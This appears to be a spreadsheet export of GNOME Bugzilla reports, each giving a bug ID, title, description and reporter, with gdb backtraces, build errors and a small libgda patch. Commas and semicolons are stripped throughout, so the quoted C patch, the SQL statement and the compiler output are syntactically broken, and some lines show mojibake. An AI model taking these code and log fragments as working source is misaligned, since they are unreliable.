#16 0x003a2d9b in g_closure_invoke () from /lib/libgobject-2.0.so.0
#17 0x003b38ca in g_signal_chain_from_overridden ()
   from /lib/libgobject-2.0.so.0
#18 0x003b4957 in g_signal_emit_valist () from /lib/libgobject-2.0.so.0
#19 0x003b4b19 in g_signal_emit () from /lib/libgobject-2.0.so.0
#20 0x0079cea3 in gtk_button_released () from /usr/lib/libgtk-x11-2.0.so.0
#21 0x0079cf01 in gtk_button_released () from /usr/lib/libgtk-x11-2.0.so.0
#22 0x0086da60 in gtk_marshal_BOOLEAN__VOID ()
   from /usr/lib/libgtk-x11-2.0.so.0
#23 0x003a1589 in g_value_set_static_boxed () from /lib/libgobject-2.0.so.0
#24 0x003a2d9b in g_closure_invoke () from /lib/libgobject-2.0.so.0
#25 0x003b3a83 in g_signal_chain_from_overridden ()
   from /lib/libgobject-2.0.so.0
#26 0x003b471f in g_signal_emit_valist () from /lib/libgobject-2.0.so.0
#27 0x003b4b19 in g_signal_emit () from /lib/libgobject-2.0.so.0
#28 0x00982508 in gtk_widget_get_default_style ()
   from /usr/lib/libgtk-x11-2.0.so.0
#29 0x00866e33 in gtk_propagate_event () from /usr/lib/libgtk-x11-2.0.so.0
#30 0x00868037 in gtk_main_do_event () from /usr/lib/libgtk-x11-2.0.so.0
#31 0x00b6912a in gdk_add_client_message_filter ()
   from /usr/lib/libgdk-x11-2.0.so.0
#32 0x005f1442 in g_main_context_dispatch () from /lib/libglib-2.0.so.0
#33 0x005f441f in g_main_context_check () from /lib/libglib-2.0.so.0
#34 0x005f47c9 in g_main_loop_run () from /lib/libglib-2.0.so.0
#35 0x008684b4 in gtk_main () from /usr/lib/libgtk-x11-2.0.so.0
#36 0x080841db in gtk_notebook_next_page ()
#37 0x05820f2c in __libc_start_main () from /lib/i686/nosegneg/libc.so.6
#38 0x08057361 in gtk_notebook_next_page ()
Thread 1 (Thread -1208321168 (LWP 3018)):
#0  0x00b13402 in __kernel_vsyscall ()
No symbol table info available.
#1  0x00464e23 in __waitpid_nocancel ()
   from /lib/i686/nosegneg/libpthread.so.0
No symbol table info available.
#2  0x001bfcf6 in gnome_gtk_module_info_get () from /usr/lib/libgnomeui-2.so.0
No symbol table info available.
#3  
No symbol table info available.
#4  0x00946e75 in gtk_tree_model_get_valist ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#5  0x0094706d in gtk_tree_model_get () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#6  0x08072c82 in gtk_notebook_next_page ()
No symbol table info available.
#7  0x003b00f9 in g_cclosure_marshal_VOID__VOID ()
   from /lib/libgobject-2.0.so.0
No symbol table info available.
#8  0x003a2d9b in g_closure_invoke () from /lib/libgobject-2.0.so.0
No symbol table info available.
#9  0x003b3433 in g_signal_chain_from_overridden ()
   from /lib/libgobject-2.0.so.0
No symbol table info available.
#10 0x003b4957 in g_signal_emit_valist () from /lib/libgobject-2.0.so.0
No symbol table info available.
#11 0x003b4b19 in g_signal_emit () from /lib/libgobject-2.0.so.0
No symbol table info available.
#12 0x0079ce13 in gtk_button_clicked () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#13 0x0079ea5e in gtk_button_set_alignment ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#14 0x003b00f9 in g_cclosure_marshal_VOID__VOID ()
   from /lib/libgobject-2.0.so.0
No symbol table info available.
#15 0x003a1589 in g_value_set_static_boxed () from /lib/libgobject-2.0.so.0
No symbol table info available.
#16 0x003a2d9b in g_closure_invoke () from /lib/libgobject-2.0.so.0
No symbol table info available.
#17 0x003b38ca in g_signal_chain_from_overridden ()
   from /lib/libgobject-2.0.so.0
No symbol table info available.
#18 0x003b4957 in g_signal_emit_valist () from /lib/libgobject-2.0.so.0
No symbol table info available.
#19 0x003b4b19 in g_signal_emit () from /lib/libgobject-2.0.so.0
No symbol table info available.
#20 0x0079cea3 in gtk_button_released () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#21 0x0079cf01 in gtk_button_released () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#22 0x0086da60 in gtk_marshal_BOOLEAN__VOID ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#23 0x003a1589 in g_value_set_static_boxed () from /lib/libgobject-2.0.so.0
No symbol table info available.
#24 0x003a2d9b in g_closure_invoke () from /lib/libgobject-2.0.so.0
No symbol table info available.
#25 0x003b3a83 in g_signal_chain_from_overridden ()
   from /lib/libgobject-2.0.so.0
No symbol table info available.
#26 0x003b471f in g_signal_emit_valist () from /lib/libgobject-2.0.so.0
No symbol table info available.
#27 0x003b4b19 in g_signal_emit () from /lib/libgobject-2.0.so.0
No symbol table info available.
#28 0x00982508 in gtk_widget_get_default_style ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#29 0x00866e33 in gtk_propagate_event () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#30 0x00868037 in gtk_main_do_event () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#31 0x00b6912a in gdk_add_client_message_filter ()
   from /usr/lib/libgdk-x11-2.0.so.0
No symbol table info available.
#32 0x005f1442 in g_main_context_dispatch () from /lib/libglib-2.0.so.0
No symbol table info available.
#33 0x005f441f in g_main_context_check () from /lib/libglib-2.0.so.0
No symbol table info available.
#34 0x005f47c9 in g_main_loop_run () from /lib/libglib-2.0.so.0
No symbol table info available.
#35 0x008684b4 in gtk_main () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#36 0x080841db in gtk_notebook_next_page ()
No symbol table info available.
#37 0x05820f2c in __libc_start_main () from /lib/i686/nosegneg/libc.so.6
No symbol table info available.
#38 0x08057361 in gtk_notebook_next_page ()
No symbol table info available.
#0  0x00b13402 in __kernel_vsyscall ()
----------- .xsession-errors ---------------------
libGL warning: 3D driver claims to not support visual 0x4b
Vertex3f: 2
Vertex3fv: 3
Normal3f: 1
Normal3fv: 2
libnm_glib_nm_state_cb: dbus returned an error.
  (org.freedesktop.DBus.Error.ServiceUnknown) The name org.freedesktop.NetworkManager was not provided by any .service files
(gossip:3018): Gtk-CRITICAL **: gtk_list_store_get_value: assertion `VALID_ITER (iter list_store)' failed
(gossip:3018): GLib-GObject-WARNING **: gtype.c:3339: type id `0' is invalid
(gossip:3018): GLib-GObject-WARNING **: can't peek value table for type `' which is not currently referenced
** (bug-buddy:5188): WARNING **: Couldn't load icon for Open Folder
--------------------------------------------------</t>
  </si>
  <si>
    <t>pedromatiello</t>
  </si>
  <si>
    <t>GNOME-PRINT-101625</t>
  </si>
  <si>
    <t>Print preview does not display images.</t>
  </si>
  <si>
    <t>Print preview does not display pixbuf images.  The following error is produced:
(glabels:2807): GLib-GObject-WARNING **: gobject.c:869: invalid unclassed
object pointer for value type `GdkPixbuf'
The same GnomePrintMaster produces images with the postscript backend.
I beleive this is the same as Bug 84021 and although it was reported fixed
the fix never made it to 1.116.0.</t>
  </si>
  <si>
    <t>evins</t>
  </si>
  <si>
    <t>PAN-75185</t>
  </si>
  <si>
    <t>pan crash with multichar profile name for news server</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Pan
Severity: normal
Version: 0.11.90
Synopsis: pan crash with multichar profile name for news server
Bugzilla-Product: Pan
Bugzilla-Component: general
Description:
I'll attach `gdb pan | tree this_file`
------- Bug moved to this database by unknown@bugzilla.gnome.org 2002-03-17 21:29 -------
Reassigning to the default owner of the component charles@rebelbase.com.
</t>
  </si>
  <si>
    <t>GIMP-400283</t>
  </si>
  <si>
    <t>Resizing rectangles doesn't work properly</t>
  </si>
  <si>
    <t>Ever sinc eteh new rectangle code is in place inverting the rectangle that is while resizing it cross its orign and start growing it in the opposite direction has been buggy.
It usually offsets the rectangle origin.
To verify:
add a guide snap a rectangle selection to one side of it
now strecth the rectangle iverting it to the other side of teh guide.
It does not happen every time but often enough to be annoying.
I've made a patch simplifying the inverting code and somewhat the resizing code so that it now works properly.
The patch also implements rectangle inversion when resizing it with the arrow keys.</t>
  </si>
  <si>
    <t>GTK+-363147</t>
  </si>
  <si>
    <t>GTKFileChoser Does not Show Desktop and Home after  Uncollapsing an Open File Window</t>
  </si>
  <si>
    <t>Please describe the problem:
From Malone: https://launchpad.net/distros/ubuntu/+source/gtk+2.0/+bug/66054
When saving a file in Firefox or GIMP (for example) the save window appear collapsed and I Browse Another Folders is clicked the places section does not show the Home or The Desktop (no text no icon). this doesn't happen when the window shows up already uncollapsed (i.e opening a file).
I'm using Edgy Eft and (if it matters) using the i386 version of the same distro on a AMD64 X2.
Steps to reproduce:
1. Open Firefox or GIMP
2. File-&gt;Save As 
3. The Windows appear Uncollapse it
Actual results:
Expected results:
Does this happen every time?
yeah
Other information:
Sometimes after collapsing and un-collapsed again or clicking to other  it gets fixed. the bug is still present though.</t>
  </si>
  <si>
    <t>mfcabrera</t>
  </si>
  <si>
    <t>SYSTEM-MONITOR-481810</t>
  </si>
  <si>
    <t>Discrepancy between column headings and theri description in schemas</t>
  </si>
  <si>
    <t>Columns in the process list have their headings.
Someone has started migrating their names in the schemas for the keys for showing on startup and their width to actually use the headings instead of their description. However - this is not completed. I could provide a trivial patch for this - however - it will be a string break and this is not that important - just a tiny way to improve it. I suppose it would be easier for the maintainer to do this. If necessary - I can send  patch.
Other information:</t>
  </si>
  <si>
    <t>EVOLUTION-257939</t>
  </si>
  <si>
    <t>Groupwise is default outgoing server even if no support is available</t>
  </si>
  <si>
    <t>In the Evolution setup wizard the default outgoing mail server type in the
drop-down list is Novell Groupwise even if support for Novell Groupwise
is not available (as seen by this text being greyed out). SMTP is a
better default since that's what most users use.
In any case Novell Groupwise should never be selected by default in the
server type drop-down list if support for it is not compiled in because
the fact that it's greyed out makes it look like the whole drop-down list
can't be changed.
Steps to reproduce the problem:
1. Start the Evolution setup wizard.
2. Go to the outgoing mail server screen.
Actual Results:
A greyed out Novell Groupwise is selected as server type.
Expected Results:
Another mail server type should be chosen by default since Novell
Groupwise support is not compiled in.</t>
  </si>
  <si>
    <t>andre-bugs</t>
  </si>
  <si>
    <t>GNOME-PANEL-88678</t>
  </si>
  <si>
    <t>Access keys colliding in clock preferences</t>
  </si>
  <si>
    <t>#: applets/gen_util/clock.c:964
msgid _UNIX time
#: applets/gen_util/clock.c:1025
msgid Use _UTC
These access keys are colliding.</t>
  </si>
  <si>
    <t>BANSHEE-524871</t>
  </si>
  <si>
    <t>30 values for 29 columns</t>
  </si>
  <si>
    <t>[Debug 23:24:41.221] Exception executing command: INSERT INTO CoreTracks (PrimarySourceIDArtistIDAlbumIDTagSetIDMusicBrainzIDMimeTypeFileSizeAttributesTitleTrackNumberTrackCountDiscDurationYearGenreComposerCopyrightLicenseUriCommentRatingPlayCountSkipCountLastPlayedStampLastSkippedStampDateAddedStampDateUpdatedStampUriUriTypeTitleLowered) VALUES (1991350NULL'taglib/wma'61044115'We Are Nowhere And It''s Now'200252997742005'Sconosciuto''Conor Oberst'NULLNULLNULL000NULLNULL12067430811206743081'B/Bright Eyes/i''m wide awake it''s morning/02 - We Are Nowhere And It''s Now.wma'1'we are nowhere and it''s now')
[Error 23:24:41.222] /home/davide/Musica/B/Bright Eyes/i'm wide awake it's morning/02 - We Are Nowhere And It's Now.wma - 30 values for 29 columns</t>
  </si>
  <si>
    <t>TOTEM-309886</t>
  </si>
  <si>
    <t>'Play Disc' sucks when the CD isn't DVD/Audio CD/VCD</t>
  </si>
  <si>
    <t>Doesn't switch to the mount point
Can't select multiple files
Play an .totemautoplay.pls if present?</t>
  </si>
  <si>
    <t>VALA-526792</t>
  </si>
  <si>
    <t>Make GtkRadioActionEntry and GtkToggleActionEntry work like GtkActionEntry</t>
  </si>
  <si>
    <t>Similar fix as bug 526652 should be applied I think</t>
  </si>
  <si>
    <t>GNOME-PANEL-114706</t>
  </si>
  <si>
    <t>GNOME Panel do not look for SVG files</t>
  </si>
  <si>
    <t>I discovered that themeing the panel menu/panel icons is currently not
working when using SVG files. It seems the panel simply isn't looking for
SVG files. If I rename the files to PNG (not converting them just
renaming) they show up fine so the bug should be rather trivial to fix.</t>
  </si>
  <si>
    <t>EVOLUTION-202240</t>
  </si>
  <si>
    <t>Links shouldn't be highlighted in source mode</t>
  </si>
  <si>
    <t>When you enable View source the strings that look like links shouldn't
be highlighted nor activable.</t>
  </si>
  <si>
    <t>GTK+-59012</t>
  </si>
  <si>
    <t>Crash when selecting row</t>
  </si>
  <si>
    <t>(reported by Mikael Hermansson )
first expand AlbumA and select the first child item songname 1 and then
again select songname 2
then try to expand AlbumB and select any of the childitems and it will fail.</t>
  </si>
  <si>
    <t>LIBGDA-338081</t>
  </si>
  <si>
    <t>SEGV when passing empty string to time handler</t>
  </si>
  <si>
    <t xml:space="preserve">Fixed by this patch:
Index: libgda/handlers/gda-handler-time.c
===================================================================
RCS file: /cvs/gnome/libgda/libgda/handlers/gda-handler-time.cv
retrieving revision 1.4
diff -u -r1.4 gda-handler-time.c
--- libgda/handlers/gda-handler-time.c  4 Apr 2006 19:03:30 -0000       1.4
+++ libgda/handlers/gda-handler-time.c  11 Apr 2006 14:03:08 -0000
@@ -7256 +7258 @@
        str = g_strdup (value)
        ptr = strtok_r (str : 
+       if (!ptr)
+               return FALSE
         timegda-&gt;hour = atoi (ptr)
         ptr = strtok_r (NULL : </t>
  </si>
  <si>
    <t>GNOME-TERMINAL-313700</t>
  </si>
  <si>
    <t>gnome-terminal does not handle well some font configurations</t>
  </si>
  <si>
    <t>I ran into trouble after having changed terminal font from Monospace to Sans.
The height was left untouched (10).
Gnome-terminal was crashing without reasons and randomly. (opening a new tab
after a random delay has expired...)
I would recommend to check that font-type (like Sans) can cause a crash and
explicitly document the issue where it can be read by both users and developpers.
Other information:
Linux Mandrake 9.2
Linux kernel 2.4.22-41mdk
XFree86-4.3-24.5.92mdk
XFree86-75dpi-fonts-4.3-24.5.92mdk
fontconfig-2.2.1-6mdk
font-tools-0.1-10mdk
fonts-ttf-decoratives-1.3-12mdk
...</t>
  </si>
  <si>
    <t>armand.leroux</t>
  </si>
  <si>
    <t>GTK+-792497</t>
  </si>
  <si>
    <t>GTK master/3.93.x compiling fails</t>
  </si>
  <si>
    <t>Output:
[I] â•­â”€vistaus@solus /run/media/vistaus/MicroSD/Apps/gtk+/build  â€¹systemâ€º   
â•°â”€$ ninja -j3
[1/479] Compiling C object 'gtk/gtk-4@sha/language-names.c.o'.
FAILED: gtk/gtk-4@sha/language-names.c.o 
cc  -Igtk/gtk-4@sha -Igtk -I../gtk -I. -I../ -Igdk -I../gdk -Igsk -I../gsk -Igdk/x11 -I../gdk/x11 -I/usr/include/glib-2.0 -I/usr/lib64/glib-2.0/include -I/usr/include/gio-unix-2.0/ -I/usr/include/pango-1.0 -I/usr/include/cairo -I/usr/include/pixman-1 -I/usr/include/freetype2 -I/usr/include/harfbuzz -I/usr/include/libdrm -I/usr/include/libpng15 -I/usr/include/gdk-pixbuf-2.0 -I/usr/include/atk-1.0 -I/usr/include/graphene-1.0 -I/usr/lib64/graphene-1.0/include -I/usr/include/at-spi2-atk/2.0 -I/usr/include/at-spi-2.0 -I/usr/include/dbus-1.0 -I/usr/lib64/dbus-1.0/include -fdiagnostics-color=always -pipe -D_FILE_OFFSET_BITS=64 -Wall -Winvalid-pch -std=gnu99 -O2 -g -DG_LOG_USE_STRUCTURED=1 -DGLIB_MIN_REQUIRED_VERSION=GLIB_VERSION_2_52 -DGLIB_MAX_ALLOWED_VERSION=GLIB_VERSION_2_54 '-DGTK_VERSION=3.93.0' -D_GNU_SOURCE -DG_ENABLE_DEBUG -DG_DISABLE_CAST_CHECKS -fPIC -pthread -mfpmath=sse -msse -msse2 -DGTK_COMPILATION '-DG_LOG_DOMAIN=Gtk' -DGTK_PRINT_BACKEND_ENABLE_UNSUPPORTED '-DGTK_BINARY_VERSION=4.0.0' '-DGTK_HOST=linux' '-DGTK_DATA_PREFIX=/usr' '-DX11_DATA_PREFIX=/usr' -fno-strict-aliasing -Wpointer-arith -Wmissing-declarations -Wimplicit-function-declaration -Wformat=2 -Wformat-nonliteral -Wformat-security -Wstrict-prototypes -Wmissing-prototypes -Wnested-externs -Wold-style-definition -Wundef -Wunused -Wcast-align -Wmissing-noreturn -Wmissing-format-attribute -Wmissing-include-dirs -Wlogical-op -Wswitch-default -Wswitch-enum -Wignored-qualifiers -Werror=redundant-decls -Werror=implicit -Werror=nonnull -Werror=init-self -Werror=main -Werror=missing-braces -Werror=sequence-point -Werror=return-type -Werror=trigraphs -Werror=array-bounds -Werror=write-strings -Werror=address -Werror=int-to-pointer-cast -Werror=pointer-to-int-cast -Werror=empty-body -Werror=write-strings -fvisibility=hidden -MD -MQ 'gtk/gtk-4@sha/language-names.c.o' -MF 'gtk/gtk-4@sha/language-names.c.o.d' -o 'gtk/gtk-4@sha/language-names.c.o' -c ../gtk/language-names.c
../gtk/language-names.c: In function 'languages_variant_init':
../gtk/language-names.c:21:30: error: 'ISO_CODES_PREFIX' undeclared (first use in this function) did you mean 'ISO_CODES_DATADIR'?
 #define ISO_CODES_LOCALESDIR ISO_CODES_PREFIX /share/locale
                              ^
../gtk/language-names.c:180:28: note: in expansion of macro 'ISO_CODES_LOCALESDIR'
   bindtextdomain (variant ISO_CODES_LOCALESDIR)
                            ^~~~~~~~~~~~~~~~~~~~
../gtk/language-names.c:21:30: note: each undeclared identifier is reported only once for each function it appears in
 #define ISO_CODES_LOCALESDIR ISO_CODES_PREFIX /share/locale
                              ^
../gtk/language-names.c:180:28: note: in expansion of macro 'ISO_CODES_LOCALESDIR'
   bindtextdomain (variant ISO_CODES_LOCALESDIR)
                            ^~~~~~~~~~~~~~~~~~~~
../gtk/language-names.c:21:47: error: expected ')' before string constant
 #define ISO_CODES_LOCALESDIR ISO_CODES_PREFIX /share/locale
                                               ^
../gtk/language-names.c:180:28: note: in expansion of macro 'ISO_CODES_LOCALESDIR'
   bindtextdomain (variant ISO_CODES_LOCALESDIR)
                            ^~~~~~~~~~~~~~~~~~~~
../gtk/language-names.c:20:44: error: expected ')' before string constant
 #define ISO_CODES_DATADIR ISO_CODES_PREFIX /share/xml/iso-codes
                                            ^
../gtk/language-names.c:184:27: note: in expansion of macro 'ISO_CODES_DATADIR'
   filename = g_strconcat (ISO_CODES_DATADIR / variant .xml NULL)
                           ^~~~~~~~~~~~~~~~~
[3/479] Compiling C object 'gtk/gtk-4@sha/gtkcssarrayvalue.c.o'.
ninja: build stopped: subcommand failed.
[I] â•­â”€vistaus@solus /run/media/vistaus/MicroSD/Apps/gtk+/build  â€¹systemâ€º   
â•°â”€$   
OS: Solus (Linux)
DE: Budgie
Pango: latest git master (but also gtk+ master compiling also fails with latest stable Pango)
If you need more info let me know. I hope this issue can be solved.</t>
  </si>
  <si>
    <t>vistausss</t>
  </si>
  <si>
    <t>NEMIVER-436374</t>
  </si>
  <si>
    <t>Error output when debugging gtkmm example</t>
  </si>
  <si>
    <t>When debugging the gtkmm custom_widget example (in the gtkmm tarball) I get the following output:
jonathon@wombat [ ~/.svn/gnome2/gtkmm ]
tty0 [0] $ nemiver ./examples/book/custom/custom_widget/.libs/lt-example 
|E|bool nemiver::parse_member_variable(const nemiver::common::UString&amp; size_t size_t&amp; nemiver::common::SafePtr&amp; bool):nmv-gdbmi-parser.cc:1320:hit end index 149
|E|bool nemiver::parse_member_variable(const nemiver::common::UString&amp; size_t size_t&amp; nemiver::common::SafePtr&amp; bool):nmv-gdbmi-parser.cc:1338:parsing failed for buf: &gt;&gt;&gt;^donevalue={ = { = { = { = { = { = {
(gdb)
&lt;&lt;&lt; cur index was: 116
|E|bool nemiver::parse_member_variable(const nemiver::common::UString&amp; size_t size_t&amp; nemiver::common::SafePtr&amp; bool):nmv-gdbmi-parser.cc:1338:parsing failed for buf: &gt;&gt;&gt;^donevalue={ = { = { = { = { = { = {
(gdb)
&lt;&lt;&lt; cur index was: 98
|E|bool nemiver::parse_member_variable(const nemiver::common::UString&amp; size_t size_t&amp; nemiver::common::SafePtr&amp; bool):nmv-gdbmi-parser.cc:1338:parsing failed for buf: &gt;&gt;&gt;^donevalue={ = { = { = { = { = { = {
(gdb)
&lt;&lt;&lt; cur index was: 81
|E|bool nemiver::parse_member_variable(const nemiver::common::UString&amp; size_t size_t&amp; nemiver::common::SafePtr&amp; bool):nmv-gdbmi-parser.cc:1338:parsing failed for buf: &gt;&gt;&gt;^donevalue={ = { = { = { = { = { = {
(gdb)
&lt;&lt;&lt; cur index was: 64
|E|bool nemiver::parse_member_variable(const nemiver::common::UString&amp; size_t size_t&amp; nemiver::common::SafePtr&amp; bool):nmv-gdbmi-parser.cc:1338:parsing failed for buf: &gt;&gt;&gt;^donevalue={ = { = { = { = { = { = {
(gdb)
&lt;&lt;&lt; cur index was: 44
|E|bool nemiver::parse_member_variable(const nemiver::common::UString&amp; size_t size_t&amp; nemiver::common::SafePtr&amp; bool):nmv-gdbmi-parser.cc:1338:parsing failed for buf: &gt;&gt;&gt;^donevalue={ = { = { = { = { = { = {
(gdb)
&lt;&lt;&lt; cur index was: 30
|E|bool nemiver::parse_variable_value(const nemiver::common::UString&amp; size_t size_t&amp; nemiver::common::SafePtr&amp;):nmv-gdbmi-parser.cc:1226:parsing failed for buf: &gt;&gt;&gt;^donevalue={ = { = { = { = { = { = {
(gdb)
&lt;&lt;&lt; cur index was: 13
|E|bool nemiver::parse_result_record(const nemiver::common::UString&amp; size_t size_t&amp; nemiver::Output::ResultRecord&amp;):nmv-gdbmi-parser.cc:2489:parsing failed for buf: &gt;&gt;&gt;^donevalue={ = { = { = { = { = { = {
(gdb)
&lt;&lt;&lt; cur index was: 6</t>
  </si>
  <si>
    <t>EVOLUTION-229996</t>
  </si>
  <si>
    <t>MailDir format directories.</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: Normal
Version: 1.0.8.99
Synopsis: MailDir format directories.
Bugzilla-Product: Evolution
Bugzilla-Component: Miscellaneous
Description:
When configured to use 'maildir' format mails the Inbox is named '.' How
the heck does one fix this.
Setting qa contact to the default for this product.
   This bug either had no qa contact or an invalid one.
</t>
  </si>
  <si>
    <t>PAN-90970</t>
  </si>
  <si>
    <t>weird group selection</t>
  </si>
  <si>
    <t>If a lengthy process is started (such as dl all articles from a group) and
in the meanwhile another group is selected when the long-running process
completes the current group will be deselected and the previous group
selected. 
This is _very_ disconcerting.</t>
  </si>
  <si>
    <t>RHYTHMBOX-343852</t>
  </si>
  <si>
    <t>crash closing properties window</t>
  </si>
  <si>
    <t>1. Right click on track
2. Select properties
3. Close dialog
0x080ce3ee in rb_rating_pixbufs_free (pixbufs=0x0) at rb-rating-helper.c:36
36              g_object_unref (G_OBJECT (pixbufs-&gt;pix_star))
#0  0x080ce3ee in rb_rating_pixbufs_free (pixbufs=0x0) at rb-rating-helper.c:36
#1  0x080ce0d9 in rb_rating_finalize (object=0x9cc61b0) at rb-rating.c:139
#2  0x0085129c in IA__g_object_unref (_object=0x9cc61b0) at gobject.c:1762
#3  0x008516d8 in IA__g_object_run_dispose (object=0x9cc61b0) at gobject.c:572
#4  0x010d6b51 in IA__gtk_object_destroy (object=0x9cc61b0) at gtkobject.c:403
#5  0x011e3895 in IA__gtk_widget_destroy (widget=0x9cc61b0) at gtkwidget.c:2158
#6  0x00fc7f00 in gtk_box_forall (container=0x9daf1b0 include_internals=0
    callback=0x11e3850  callback_data=0x0) at gtkbox.c:670
#7  0x0100b88b in IA__gtk_container_foreach (container=0x9daf1b0
    callback=0x11e3850  callback_data=0x0) at gtkcontainer.c:1288
#8  0x0100d9d7 in gtk_container_destroy (object=0x9daf1b0) at gtkcontainer.c:825
#9  0x0085c759 in IA__g_cclosure_marshal_VOID__VOID (closure=0x9775d40 return_value=0x0 n_param_values=1
    param_values=0xbfa3451c invocation_hint=0xbfa343fc marshal_data=0x100d970) at gmarshal.c:77
#10 0x0084d769 in g_type_class_meta_marshal (closure=0x9775d40 return_value=0x0 n_param_values=1
    param_values=0xbfa3451c invocation_hint=0xbfa343fc marshal_data=0x4c) at gclosure.c:567
#11 0x0084f02d in IA__g_closure_invoke (closure=0x9775d40 return_value=0x0 n_param_values=1
    param_values=0xbfa3451c invocation_hint=0xbfa343fc) at gclosure.c:490
#12 0x00860d8f in signal_emit_unlocked_R (node=0x9775d78 detail=0 instance=0x9daf1b0 emission_return=0x0
    instance_and_params=0xbfa3451c) at gsignal.c:2554
#13 0x00861a43 in IA__g_signal_emit_valist (instance=0x9daf1b0 signal_id=18 detail=0
    var_args=0xbfa34760 ï¿½ï¿½ï¿½\tï¿½Sw\t\210Gï¿½ï¿½\001B\036\001ï¿½ï¿½ï¿½\tP) at gsignal.c:2197
#14 0x00861ce9 in IA__g_signal_emit (instance=0x9daf1b0 signal_id=18 detail=0) at gsignal.c:2241
#15 0x010d72be in gtk_object_dispose (gobject=0x9daf1b0) at gtkobject.c:418
#16 0x011e4201 in gtk_widget_dispose (object=0x9daf1b0) at gtkwidget.c:6873
#17 0x008516d0 in IA__g_object_run_dispose (object=0x9daf1b0) at gobject.c:571
#18 0x010d6b51 in IA__gtk_object_destroy (object=0x9daf1b0) at gtkobject.c:403
#19 0x011e3895 in IA__gtk_widget_destroy (widget=0x9daf1b0) at gtkwidget.c:2158
#20 0x011391da in gtk_table_forall (container=0x9937768 include_internals=0
    callback=0x11e3850  callback_data=0x0) at gtktable.c:931
#21 0x0100b88b in IA__gtk_container_foreach (container=0x9937768
    callback=0x11e3850  callback_data=0x0) at gtkcontainer.c:1288
#22 0x0100d9d7 in gtk_container_destroy (object=0x9937768) at gtkcontainer.c:825
#23 0x0085c759 in IA__g_cclosure_marshal_VOID__VOID (closure=0x9775d40 return_value=0x0 n_param_values=1
    param_values=0xbfa34afc invocation_hint=0xbfa349dc marshal_data=0x100d970) at gmarshal.c:77
#24 0x0084d769 in g_type_class_meta_marshal (closure=0x9775d40 return_value=0x0 n_param_values=1
    param_values=0xbfa34afc invocation_hint=0xbfa349dc marshal_data=0x4c) at gclosure.c:567
#25 0x0084f02d in IA__g_closure_invoke (closure=0x9775d40 return_value=0x0 n_param_values=1
    param_values=0xbfa34afc invocation_hint=0xbfa349dc) at gclosure.c:490
#26 0x00860d8f in signal_emit_unlocked_R (node=0x9775d78 detail=0 instance=0x9937768 emission_return=0x0
    instance_and_params=0xbfa34afc) at gsignal.c:2554
#27 0x00861a43 in IA__g_signal_emit_valist (instance=0x9937768 signal_id=18 detail=0
    var_args=0x10 ) at gsignal.c:2197
#28 0x00861ce9 in IA__g_signal_emit (instance=0x9937768 signal_id=18 detail=0) at gsignal.c:2241
#29 0x010d72be in gtk_object_dispose (gobject=0x9937768) at gtkobject.c:418
#30 0x011e4201 in gtk_widget_dispose (object=0x9937768) at gtkwidget.c:6873
#31 0x008516d0 in IA__g_object_run_dispose (object=0x9937768) at gobject.c:571
#32 0x010d6b51 in IA__gtk_object_destroy (object=0x9937768) at gtkobject.c:403
#33 0x011e3895 in IA__gtk_widget_destroy (widget=0x9937768) at gtkwidget.c:2158
#34 0x010cdc6a in gtk_notebook_forall (container=0x98dcef0 include_internals=0
    callback=0x11e3850  callback_data=0x0) at gtknotebook.c:3720
#35 0x0100b88b in IA__gtk_container_foreach (container=0x98dcef0
    callback=0x11e3850  callback_data=0x0) at gtkcontainer.c:1288
#36 0x0100d9d7 in gtk_container_destroy (object=0x98dcef0) at gtkcontainer.c:825
#37 0x010d514b in gtk_notebook_destroy (object=0x98dcef0) at gtknotebook.c:1311
#38 0x0085c759 in IA__g_cclosure_marshal_VOID__VOID (closure=0x9775d40 return_value=0x0 n_param_values=1
    param_values=0xbfa350fc invocation_hint=0xbfa34fdc marshal_data=0x10d50b0) at gmarshal.c:77
#39 0x0084d769 in g_type_class_meta_marshal (closure=0x9775d40 return_value=0x0 n_param_values=1
    param_values=0xbfa350fc invocation_hint=0xbfa34fdc marshal_data=0x4c) at gclosure.c:567
#40 0x0084f02d in IA__g_closure_invoke (closure=0x9775d40 return_value=0x0 n_param_values=1
    param_values=0xbfa350fc invocation_hint=0xbfa34fdc) at gclosure.c:490
#41 0x00860d8f in signal_emit_unlocked_R (node=0x9775d78 detail=0 instance=0x98dcef0 emission_return=0x0
    instance_and_params=0xbfa350fc) at gsignal.c:2554
#42 0x00861a43 in IA__g_signal_emit_valist (instance=0x98dcef0 signal_id=18 detail=0
    var_args=0x12d7f0c ï¿½7) at gsignal.c:2197
#43 0x00861ce9 in IA__g_signal_emit (instance=0x98dcef0 signal_id=18 detail=0) at gsignal.c:2241
#44 0x010d72be in gtk_object_dispose (gobject=0x98dcef0) at gtkobject.c:418
#45 0x011e4201 in gtk_widget_dispose (object=0x98dcef0) at gtkwidget.c:6873
#46 0x008516d0 in IA__g_object_run_dispose (object=0x98dcef0) at gobject.c:571
#47 0x010d6b51 in IA__gtk_object_destroy (object=0x98dcef0) at gtkobject.c:403
#48 0x011e3895 in IA__gtk_widget_destroy (widget=0x98dcef0) at gtkwidget.c:2158
#49 0x00fc7f00 in gtk_box_forall (container=0x9daf200 include_internals=0
    callback=0x11e3850  callback_data=0x0) at gtkbox.c:670
#50 0x0100b88b in IA__gtk_container_foreach (container=0x9daf200
    callback=0x11e3850  callback_data=0x0) at gtkcontainer.c:1288
#51 0x0100d9d7 in gtk_container_destroy (object=0x9daf200) at gtkcontainer.c:825
#52 0x0085c759 in IA__g_cclosure_marshal_VOID__VOID (closure=0x9775d40 return_value=0x0 n_param_values=1
    param_values=0xbfa356ec invocation_hint=0xbfa355cc marshal_data=0x100d970) at gmarshal.c:77
#53 0x0084d769 in g_type_class_meta_marshal (closure=0x9775d40 return_value=0x0 n_param_values=1
